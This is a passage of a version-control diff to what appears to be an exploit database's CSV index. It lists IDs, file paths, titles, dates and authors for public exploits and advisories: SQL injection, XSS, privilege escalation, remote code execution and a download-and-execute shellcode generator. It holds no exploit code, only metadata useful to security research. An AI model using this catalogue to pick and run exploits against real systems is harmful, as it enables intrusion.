35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0 @@ -32280,6 +32282,9 @@ id,file,description,date,author,platform,type,port 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0 +35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 'com_virtualmoney' Component SQL Injection Vulnerability",2011-07-25,FL0RiX,php,webapps,0 35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 @@ -32295,7 +32300,12 @@ id,file,description,date,author,platform,type,port 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0 35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 -35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0 +35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220_ 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0 +35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35994,platforms/windows/local/35994.c,"BullGuard Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 +35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 +35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure Vulnerability",2011-07-27,securititracker,hardware,remote,0 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 @@ -32339,6 +32349,7 @@ id,file,description,date,author,platform,type,port 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0 +35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash PoC",2015-01-23,"Kapil Soni",windows,dos,0 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 @@ -32353,14 +32364,22 @@ id,file,description,date,author,platform,type,port 35900,platforms/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass Vulnerability",2015-01-26,Vulnerability-Lab,cgi,webapps,0 35901,platforms/windows/local/35901.txt,"VLC Player 2.1.5 - DEP Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0 35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0 -35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management Vulnerability",2015-01-26,"Rewterz - Research Group",jsp,webapps,0 +35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - CSRF Vulnerability",2015-02-03,"Mohamed Idris",multiple,webapps,8020 +35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management Vulnerability",2015-01-26,"Rewterz - Research Group",jsp,webapps,0 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0 35906,platforms/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps,0 35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS) Vulnerability",2015-01-26,"Maddy Khan",multiple,webapps,0 +35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / XSS Vulnerabilities",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 -35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0 -35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rsemann",php,webapps,80 +36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 +35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,metasploit,windows,local,0 +35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 +35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 35916,platforms/php/webapps/35916.txt,"Wordpress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0 @@ -32397,8 +32416,8 @@ id,file,description,date,author,platform,type,port 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35950,platforms/php/webapps/35950.txt,"NPDS CMS Revolution-13 - SQL Injection Vulnerability",2015-01-24,"Narendra Bhati",php,webapps,80 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0 -35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox 'id' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0 +35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0 35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0 @@ -32407,6 +32426,7 @@ id,file,description,date,author,platform,type,port 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 +35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting Vulnerability",2011-07-15,SOLVER,php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection Vulnerability",2011-07-15,"Robert Cooper",php,webapps,0 @@ -32423,24 +32443,7 @@ id,file,description,date,author,platform,type,port 35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection Vulnerability",2011-07-25,3spi0n,php,webapps,0 35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection Vulnerability",2011-07-25,Lazmania61,php,webapps,0 -35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - CSRF Vulnerability",2015-02-03,"Mohamed Idris",multiple,webapps,8020 -35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 -35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,metasploit,windows,local,0 -35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 'com_virtualmoney' Component SQL Injection Vulnerability",2011-07-25,FL0RiX,php,webapps,0 -35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0 -35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 -35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rsemann",php,webapps,80 -35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 -35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 -35994,platforms/windows/local/35994.c,"BullGuard Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 -35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 -35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 -35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure Vulnerability",2011-07-27,securititracker,hardware,remote,0 -35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script 'cid' Parameter SQL Injection Vulnerability",2011-07-25,Ehsan_Hp200,php,webapps,0 +36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 36000,platforms/php/webapps/36000.txt,"HP Network Automation <= 9.10 SQL Injection Vulnerability",2011-07-28,anonymous,php,webapps,0 36001,platforms/asp/webapps/36001.txt,"Sitecore CMS <= 6.4.1 'url' Parameter URI Redirection Vulnerability",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 @@ -32462,14 +32465,17 @@ id,file,description,date,author,platform,type,port 36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 -36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0 +36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 +36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0 36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0 -36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo Gonzlez",linux,dos,0 +36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0 +36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 +36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0 36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 36033,platforms/php/webapps/36033.txt,"Search Network 2.0 'query' Parameter Cross Site Scripting Vulnerability",2011-08-08,darkTR,php,webapps,0 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 @@ -32478,8 +32484,6 @@ id,file,description,date,author,platform,type,port 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0 -36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 -36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0 @@ -32494,10 +32498,9 @@ id,file,description,date,author,platform,type,port 36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-02-11,"dogo h@ck",windows,local,0 36054,platforms/php/webapps/36054.txt,"Wordpress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection Vulnerability",2015-02-11,Vulnerability-Lab,php,webapps,8080 -36056,platforms/windows/remote/36056.rb,"Achat v0.150 beta7 Buffer Overflow",2015-02-11,metasploit,windows,remote,9256 +36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow",2015-02-11,metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 -36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0 -36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 +36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection Vulnerabilities",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 @@ -32506,7 +32509,6 @@ id,file,description,date,author,platform,type,port 36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection Vulnerability",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion 'probe.cfm' Cross Site Scripting Vulnerability",2011-08-18,G.R0b1n,cfm,webapps,0 36068,platforms/php/webapps/36068.txt,"MantisBT <= 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0 -36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow Vulnerability",2011-08-19,KedAns-Dz,windows,dos,0 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 'onefilecms.php' Cross Site Scripting Vulnerability",2011-08-21,mr.pr0n,php,webapps,0 36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x 'index.php' Cross Site Scripting Vulnerability",2011-08-22,"mehdi boukazoula",php,webapps,0 @@ -32553,18 +32555,18 @@ id,file,description,date,author,platform,type,port 36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 'QuickTimePlayer.dll' ActiveX Buffer Overflow Vulnerability",2011-09-06,"Ivan Sanchez",windows,remote,0 36116,platforms/asp/webapps/36116.txt,"Kisanji 'gr' Parameter Cross Site Scripting Vulnerability",2011-09-06,Bl4ck.Viper,asp,webapps,0 36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-09-06,"Yassin Aboukir",php,webapps,0 +36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 'themename' Parameter Cross Site Scripting Vulnerability",2011-09-05,"High-Tech Bridge SA",php,webapps,0 36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross Site Scripting Vulnerability",2011-09-08,sonyy,php,webapps,0 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection Vulnerability",2011-09-08,SubhashDasyam,php,webapps,0 -36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 -36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 -36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rsemann",php,webapps,80 +36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection Vulnerability",2015-02-20,"K.d Long",xml,webapps,0 +36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0 36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0 @@ -32585,22 +32587,22 @@ id,file,description,date,author,platform,type,port 36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0 +36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 -36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (MSF)",2015-02-23,"Pablo Gonzlez",php,webapps,80 +36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (MSF)",2015-02-23,"Pablo González",php,webapps,80 36158,platforms/php/dos/36158.txt,"PHP DateTime Use After Free Vulnerability",2015-02-23,"Taoguang Chen",php,dos,0 -36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rsemann",php,webapps,80 -36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rsemann",php,webapps,80 +36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 +36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF Vulnerability",2015-02-23,"Eric Flokstra",php,webapps,80 36162,platforms/php/webapps/36162.txt,"TWiki <= 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0 36163,platforms/php/webapps/36163.txt,"TWiki <= 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 -36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10, WordPress 3.1.x, DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0 +36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10_ WordPress 3.1.x_ 